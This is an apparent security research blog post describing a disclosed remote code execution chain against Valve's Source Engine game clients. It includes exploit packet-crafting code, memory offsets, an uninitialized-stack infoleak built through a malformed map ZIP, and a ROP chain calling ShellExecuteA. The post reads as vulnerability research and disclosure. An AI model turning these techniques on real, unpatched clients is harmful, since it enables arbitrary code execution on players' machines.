In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem to concerned by this, as its been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is the value of either the integer value of the CVar, or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check to make sure that this value is sane, and crash the game if they weren’t. But, this is not what happens in practice. In release builds of the game, all Assert statements are not compiled into the game. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. This means that m_EntityCacheInfo since is at a static global offset, this allows us to calculate the proper values of entnum for our exploit easily by locating the offset of m_EntityCacheInfo in any given version of client.dll and calculating a proper value of entnum to create our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable as long as it is aligned to an 8 byte boundary (as sizeof(m_EntityCacheInfo) == 8). This is important for finding future exploit chaining.

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

image-20200507164606006

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const cha *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x1C). As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability requires that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated so that we can align m_pszString to correctly to return it to GetClientNetworkable.

This can be seen by what GetClientNetworkable looks like in x64dbg:

image-20200507170851575

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

image-20200507173708203

This means to calculate the value of m_pszString, we add 0x1A to get 0x10C6B788 + 0x1C = 0x10C6b7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable
  • The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

	m_nTick = buffer.ReadLong();
#if PROTOCOL_VERSION > 10
	m_flHostFrameTime = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
	m_flHostFrameTimeStdDeviation = (float)buffer.ReadUBitLong( 16 ) / NET_TICK_SCALEUP;
#endif
	return !buffer.IsOverflowed();
}

As you might see, m_nTick is controlled by the contents of the NET_Tick packet directly. This means we can assign this to an arbitrary 32-bit value. It just so happens that this value is stored at a global as well! After some scripting up in Frida, I confirmed that this is indeed completely controllable by the NET_Tick packet from the server:

image-20200513141444074

The code to send this packet with my Frida bindings is quite simple too:

function SetClientTick(bf: bf_write, value: NativePointer) {
    bf.WriteUBitLong(net_Tick, NETMSG_BITS)

    // Tick count (Stored in m_ClientGlobalVariables->tickcount)
    bf.WriteLong(value.toInt32())

    // Write m_flHostFrameTime -> 1
    bf.WriteUBitLong(1, 16);

    // Write m_flHostFrameTimeStdDeviation -> 1
    bf.WriteUBitLong(1, 16);
}

Now we have a candidate location to point our vtable pointer. We just have to point it at &tickcount - 24 and the engine will believe that tickcount is the function that should be called in the vtable. After a bit of testing, here’s the resulting script which creates and sends the SVC_PacketEntities packet to the client to trigger the exploit:

// craft the netmessage for the PacketEntities exploit
function SendExploit_PacketEntities(bf: bf_write, offset: number) {
    bf.WriteUBitLong(svc_PacketEntities, NETMSG_BITS)

    // Max entries
    bf.WriteUBitLong(0, 11)

    // Is Delta?
    bf.WriteBit(0)

    // Baseline?
    bf.WriteBit(0)

    // # of updated entries?
    bf.WriteUBitLong(1, 11)

    // Length of update packet?
    bf.WriteUBitLong(55, 20)

    // Update baseline?
    bf.WriteBit(0)

    // Data_in after here
    bf.WriteUBitLong(3, 2) // our data_in is of type 32-bit integer

    // >>>>>>>>>>>>>>>>>>>> The out of bounds type confusion is here <<<<<<<<<<<<<<<<<<<<
    bf.WriteUBitLong(offset, 32)

    // enterpvs flag
    bf.WriteBit(0)

    // zero for the rest of the packet
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
    bf.WriteUBitLong(0, 32)
}

Now we’ve got the following modified chain:

  • Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
  • The code dereferences the first value inside of m_pszString to get the pointer to the vtable. We point this at &tickcount - 6*4 which we control.
  • The code offsets the vtable to index 6, dereferences, and calls the “function”, which will be the value we put in tickcount.

This generally looks like this in the exploit script:

// The fake object pointer and the ROP chain are stored in this cvar
ReplicateCVar(pkts_to_send, "sv_mumble_positionalaudio", tickCountAddress)

// Set a known location inside of engine.dll so we can use it to point our vtable value to
SetClientTick(pkts_to_send, new NativePointer(0x41414141))

// Then use exploit in PacketEntities to fake the object pointer to point to sv_mumble_positionalaudio's string value
SendExploit_PacketEntities(pkts_to_send, 0x26DA) 

0x26DA was calculated above to be the necessary entnum value to cause the out-of-bounds and align us to sv_mumble_positionalaudio->m_pszString.

Finally, we can see the results of our efforts:

image-20200513142919977

As we can see here, 0x41414141 is being popped off the stack at the ret, giving us a one-shot arbitrary execute! What you can’t see here is that, further down on the stack, our entire packet is sitting there unchanged, giving us ample room for a ROP chain.

Now, all we need is a pivot, which can be easily found using the Ropper project. After finding an appropriate pivot, we now can begin crafting a ROP chain… except we are missing something important. We don’t know where any gadgets are located in memory, including our stack pivot! Up until now, everything we’ve done is with relative offsets, but now we don’t even know where to point the value of 0x41414141 to on the client, because the layout of the code is randomized by ASLR. The easy way out would be to load up CS:GO and use xinput.dll addresses for our ROP chain… but that would violate my arbitrary constraint that this exploit must work for all Source games.

This means we need to go infoleak hunting.

Leaking uninitialized stack memory using a tricky ZIP file bug

After auditing the engine for many days over the course of a few months, I was finally able to engineer a series of tricks to chain together to cause the engine to leak uninitialized stack memory. This was all-in-all significantly harder than the memory corruption, and required a lot of out-of-the-box thinking to get it to work. This was my favorite part of the exploit. Here’s some background on how some of these systems work inside the engine and how they can be chained together:

  • Servers can cause the client to upload arbitrary files with certain file extensions
  • Map files can contain an embedded ZIP file which can package additional textures/files. This is called a “pakfile”.
  • When the map has a pakfile, the engine adds the zip file as sort of a “virtual overlay” on the regular filesystem the game uses to read/write files. This means that, in any file accesses the game makes, it will check the map’s pakfile to see if it can read it from there.

The interesting behavior I discovered about this system is that, if the server requests a file that is inside of the map’s pakfile, the client will upload that file from the embedded ZIP to the server. This wouldn’t make any sense in a normal case, but what it does is create a very unintended attack surface.

Now, let’s take a look at the function which is responsible for determining how large the file is that is going to be uploaded to the server, and if it is too large to be sent:

int totalBytes = g_pFileSystem->Size( filename, pPathID );

if ( totalBytes >= (net_maxfilesize.GetInt()*1024*1024) )
{
    ConMsg( "CreateFragmentsFromFile: '%s' size exceeds net_maxfilesize limit (%i MB).\n", filename, net_maxfilesize.GetInt() );
    return false;
}

So, what happens inside of g_pFileSystem->Size when you point it to a file inside the pakfile? Well, the code reads the ZIP file structure and locates the file, then reads the size directly from the ZIP header:

image-20200430014752750

Notice: lookup.m_nLength = zipFileHeader.uncompressedSize

Now we fully control the contents of the map file we gave to the client when they loaded in. Therefore, we control all the contents of the embedded pakfile inside the map. This means we control the full 32-bit value returned by g_pFileSystem->Size( filename, pPathID );.

So, maybe you have noticed where we’re going. int totalBytes is a signed integer, and the comparison for whether a file is too large is determined by a signed comparison. What happens when totalBytes is negative? That makes it fully pass the length check.

If we are able to hack a file into the ZIP structure with a negative length, the engine will now happily upload to the server.

Let’s look at the function responsible for reading the file to be uploaded to the server.

Inside of CNetChan::SendSubChannelData:

g_pFileSystem->Seek( data->file, offset, FILESYSTEM_SEEK_HEAD );
g_pFileSystem->Read( tmpbuf, length, data->file );
buf.WriteBytes( tmpbuf, length );

A stack buffer of size 0x100 is used to read contents of the file in 0x100 sized chunks as the file is sent to the server. It does so by calling g_pFileSystem->Read() on the file pointer and reading out the data to a temporary buffer on stack. The subchannel believes this file to be very large (as the subchannel interprets the size as an unsigned integer). The networking code will indefinitely send chunks to the server by allocating 0x100 of stack space and calling ->Read(). But, when the file pointer reaches the end of the pakfile, the calls to ->Read() stop writing out any data to the stack as there is no data left to read. Rather than failing out of this function, the return value of ->Read() is ignored and the data is sent Anyway. Because the stack’s contents are not cleared with each iteration, 0x100 bytes of uninitialized stack data are sent to the server constantly. The client’s subchannel will continue to send fragments indefinitely as the “file size” is too large to ever be sent successfully.

After quite a bit of learning about how the PKZIP file structure works, I was able to write up this Python script which can take an existing BSP and hack in a negatively sized file into the pakfile. Here’s the result:

image-20200506163703366

Now, we can test it by loading up Frida and crafting a packet to request the hacked file be uploaded to the server from the pakfile. Then, we can enable net_showfragments 1 in the game’s console to see all of the fragments that are being sent to us:

image-20200506171807825

This shows us that the client is sending many file fragments (num = 1 means file fragment). When left running, it will not stop re-leaking that stack memory to us, and will just continue to do so infinitely as long as the client is connected. This happens slowly over time, so the client’s game is unaffected.

I also placed a Frida Interceptor hook on the function responsible for reading the file’s size, and here we can see that it is indeed returning a negative number:

image-20200506164957309

Lastly, I hooked the function responsible for processing incoming file fragment packets on the server, and lo and behold, I have this blob of data being sent to us:

           0  1  2  3  4  5  6  7  8  9  A  B  C  D  E  F  0123456789ABCDEF
00000000  50 4b 05 06 00 00 00 00 06 00 06 00 f0 01 00 00  PK..............
00000010  86 62 00 00 20 00 58 5a 50 31 20 30 00 00 00 00  .b.. .XZP1 0....
00000020  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
00000030  00 00 00 00 00 00 fa 58 13 00 00 58 13 00 00 26  .......X...X...&
00000040  00 00 00 00 00 00 00 00 00 00 00 00 00 19 3b 00  ..............;.
00000050  00 6d 61 74 65 72 69 61 f0 5e 65 62 30 2e b9 05  .materia.^eb0...
00000060  60 55 65 62 9c 76 71 00 ce 92 61 62 f0 5e 65 62  `Ueb.vq...ab.^eb
00000070  08 0b b9 05 b8 00 7c 6d 30 2e b9 05 b9 00 7c 6d  ......|m0.....|m
00000080  f0 5e 65 62 f0 5e 65 62 f0 89 61 62 f0 5e 65 62  .^eb.^eb..ab.^eb
00000090  44 00 00 00 60 55 65 62 60 55 65 62 00 00 00 00  D...`Ueb`Ueb....
000000a0  00 b5 4e 00 00 6d 61 74 65 72 69 61 6c 73 2f 6d  ..N..materials/m
000000b0  61 70 73 2f 63 70 5f 63 ec 76 71 00 00 02 00 00  aps/cp_c.vq.....
000000c0  0a a4 bc 7b 30 2e b9 05 f0 70 88 68 40 00 00 00  ...{0....p.h@...
000000d0  00 a5 db 09 01 00 00 00 c4 dc 75 00 16 00 00 00  ..........u.....
000000e0  00 00 00 00 98 77 71 00 00 00 00 00 00 00 00 00  .....wq.........
000000f0  30 77 71 00 cb 27 b3 7b 00 03 00 00 97 27 b3 7b  0wq..'.{.....'.{

You might not be able to tell, but this data is uninitialized. Specifically, there are pointer values that begin with 0x7B or 0x7C littered in here:

  • 97 27 b3 7b
  • 0a a4 bc 7b
  • 05 b9 00 7c
  • 05 b8 00 7c

The offsets of these pointer values in the 0x100 byte buffer are not always at the same place. Some heuristics definitely go a long way here. A simple mapping of DWORD values inside the buffer over time can show that some values quickly look like pointers and some do not. After a bit of tinkering with this leak, I was able to get it controlled to leak a known pointer value with ~100% certainty.

Here’s what the final output of the exploit looked like against a typical user:

[*] Intercepting ReadBytes (frag = 0)
0x0: 0x14b5041
0x4: 0x14001402
0x8: 0x0
0xc: 0x0
0x10: 0xd99e8b00
0x14: 0xffff00d3
0x18: 0xffff00ff
0x1c: 0x8ff
0x20: 0x0
0x24: 0x0
0x28: 0x18000
0x2c: 0x74000000
0x30: 0x2e747365
0x34: 0x50747874
0x38: 0x6054b
0x3c: 0x1000000
0x40: 0x36000100
0x44: 0x27000000
[...]
0xcc: 0xafdd68
0xd0: 0xa097d0c
0xd4: 0xa097d00
0xd8: 0xab780c
0xdc: 0x4
0xe0: 0xab7778
0xe4: 0x7ac9ab8d
0xe8: 0x0
0xec: 0x80
0xf0: 0xab7804
0xf4: 0xafdd68
0xf8: 0xab77d4
0xfc: 0x0
[*] leakedPointer: 0x7ac9ab8d
[*] Engine_Leak2 offset: 0x23ab8d
[*] leakedBase: 0x7aa60000

Only one of these values had a lower WORD offset that made sense (0xE4) therefore it was easily selectable from the list of DWORDS. After leaking this pointer, I traced it back in IDA to a return location for the upper stack frame of this function, which makes total sense. I gave it a label Engine_Leak2 in IDA, which could be loaded directly from my ret-sync connection to dynamically calculate the proper base address of the engine.dll module:

// calculate the engine base based on the RE'd address we know from the leak
static convertLeakToEngineBase(leakedPointer: NativePointer) {
    console.log("[*] leakedPointer: " + leakedPointer)

    // get the known offset of the leaked pointer in our engine.dll
    let knownOffset = se.util.require_offset("Engine_Leak2");
    console.log("[*] Engine_Leak2 offset: " + knownOffset)

    // use the offset to find the base of the client's engine.dll
    let leakedBase = leakedPointer.sub(knownOffset);
    console.log("[*] leakedBase: " + leakedBase)

    if ((leakedBase.toInt32() & 0xFFFF) !== 0) {
        console.log("[!] Failed leak...")
        return null;
    }

    console.log("[*] Got it!")
    return leakedBase;
}

The Final Chain + RCE!

After successfully developing the infoleak, now we have both a pointer leak and an arbitrary execute bug. These two are sufficient enough for us to craft a ROP chain and pop that sweet sweet calculator. The nice part about Frida being a Python module at its core is that you can use pyinstaller to turn any Frida script into an all-in-one executable. That way, all you have to do is copy the .exe onto a server, run your Source dedicated server, and launch the .exe to arm the server for exploitation.

Anyway, here is the full step-by-step detail of chaining the two bugs together:

  1. Player joins the exploitation server. This is picked up by the PoC script and it begins to exploit the client.

  2. Player downloads the map file from the server. The map file is specially prepared to install test.txt into the GAME filesystem path with the compromised length

  3. The server executes RequestFile to request the test.txt file from the pakfile. The client builds fragments for the new file and begins sending 0x100 sized fragments to the server, leaking stack contents. Inside the stack contents is a leaked stack frame return address from a previous call to bf_read::ReadBytes. By doing some calculations on the server, this achieves a full ASLR protection bypass on the client.

  4. The malicious server calculates the base of engine.dll on the client instance using the leaked pointer. This allows the server to now build a pointer value in the exploit payload to anywhere within engine.dll. Without this infoleak bug, the payload could not be built because the attacker does not know the location of any module due to ASLR.

  5. The server script builds a fake vtable pointer on the target client instance by replicating a ConVar onto the client. This is used to build a fake vtable on the client with a pointer to the fake vtable in a known location (the global ConVar). The PoC replicates the fake vtable onto sv_mumble_positionalaudio which is a replicated ConVar inside of client.dll. The location of the contents of this replicated ConVar can be calculated from sv_mumble_positionalaudio->m_pszString and is used for later exploitation steps.

  6. The server builds a ROP chain payload to execute the Windows API call for ShellExecuteA. This ROP chain is used to bypass the NX protection on modern Windows systems. The chain utilizes the known addresses in engine.dll that were leaked from the exploitation of the separate bug in Step 3. Upon successful exploitation, this ROP chain can execute arbitrary code.

  7. The script again replicates the ConVar sv_downloadurl onto the client instance with the value of C:/Windows/System32/winver.exe. This is used by the ROP chain as the target program to execute with ShellExecuteA. This ConVar exists inside of engine.dll so the pointer sv_download_url->m_pszString is now at an attacker known location.

  8. The server sends a crafted NET_Tick message to modify the value of g_ClientGlobalVariables->tickcount to be a pointer to a stack pivot gadget found inside of engine.dll (again, leaked from Step 3). Essentially, this is another trick to get a pointer value to exist at an attacker controlled location within engine.dll.

  9. Now, the next bug will be used by creating a specially crafted SVC_PacketEntities netmessage which will call CL_CopyExistingEntity on the client instance with the vulnerable value for m_nNewEntity. This value will exploit the array overrun in GetClientNetworkable inside of client.dll and allows us to confuse the pointer return value to instead be a pointer to sv_mumble_positionalaudio->m_pszString (also inside client.dll). At the location of sv_mumble_positionalaudio->m_pszString is the fake object pointer created in Step 4. This object pointer will redirect execution by pretending to be an IClientNetworkable* object and redirect the virtual method call to the value found within g_ClientGlobalVariables->tickcount. This means we can set the instruction pointer to any value specified by the NET_Tick trick we used in Step 7.

  10. Lastly, to execute the ROP chain and achieve RCE, the g_ClientGlobalVariables->tickcount is pointed to a stack pivot gadget inside of engine.dll. This pivots the stack to the ROP payload that was placed in sv_mumble_positionalaudio->m_pszString in Step 4. The ROP chain then begins execution. The chain will load necessary arguments to call ShellExecuteA, then execute whatever program path we replicated onto sv_downloadurl given in Step 6. In this case, it is used to execute winver.exe for proof of concept. This chain can execute any code of the attacker’s choosing, and has full permissions to access all of the users files and data.

And there you have it. This entire exploitation happens automatically, and does so by using Frida to inject into the dedicated server process to instrument to do all of the steps above. This is quite involved, but the result is pretty awesome! Here’s a video of the full PoC in action, be sure to full screen it so it’s easier to see:

Disclosure Timeline

  • [2020-05-13] Reported to Valve through HackerOne
  • [2020-05-18] Bug triaged
  • [2021-04-28] Notification that the bugs were fixed in Beta
  • [2021-04-30] Bounty paid ($7500) and notification that the bugs were fixed in Retail

Supporting Files

Exploit PoC and the map hacking Python script referenced in this post are available in full at:

https://github.com/Gbps/sourceengine-packetentities-rce-poc

For the Frida exploit chain: https://github.com/Gbps/sourceengine-packetentities-rce-poc/tree/master/src/agent

But sure to give it a ⭐ if you liked it!

Final thoughts

This chain was super fun to develop, and the constraints I placed on myself made the exploit way more interesting than my first submission. I’m glad that the report finally went through so I could publish the information for everyone to read. It really goes to show that even a fairly simple set of bugs on paper can turn into a complex exploitation effort quickly when targeting big software applications. But, doing so helps you develop skills that you might not necessarily pick up from simple CTF problems.

Incorporating the Frida project definitely reinvigorated my drive to continue poking and testing PoCs for bugs, as the process for scripting up examples was much nicer than before. I hope to spend some time in a future post to discuss more ways to utilize Frida on the desktop, and also hope to publish my ret-sync Frida plugin in an official capacity on my GitHub soon.

I’m also working on some other projects in the meantime, off-and-on. I have also been writing a fairly large project which implements a CS:GO client from scratch in Rust to help improve my skills with the language. After a ton of work, I can happily say my client can authenticate with Steam, fully connect and load into a server, send and receive netchannel packets with the game server, and host a fake console to execute concommands. There is no graphical portion of this, it is entirely command line based.

In addition, I’ve started to shift my focus somewhat away from Source and onto Steam itself. Steam is a vastly complex application, and its networking protocol it uses is magnitudes more complex than that of Source. There hasn’t been too much research done in the public on Steam’s networking protocols, so I’ve written a few tools that can fully encode/decode this networking layer and intercept packets to learn how they work. Even an idle instance of Steam running creates a lot of very interesting traffic that very few people have looked at! More information on this hopefully soon.

For now, I don’t have a timeline for the release of any of those projects, or for the next blog post I will write, but hopefully it won’t be as long as it took to get this one out ;)

Thank you for reading!

Exploiting the Source Engine (Part 1)

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got involved obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit was very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kind of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.

image-20180802185147009
Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and the Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series’ in history, including Half-Life, Team Fortress, Portal, and Counter Strike.

Timeline:

  • 1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
  • 2004 - Valve releases the Source Engine based on GoldSrc.
  • 2007 - The source code to the Source Engine is leaked.
  • 2012 - CS:GO is released, and with it, “Source 1.5” begins development.
  • 2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
  • 2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
  • 2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for their current engine versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consists of two separate parts, the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

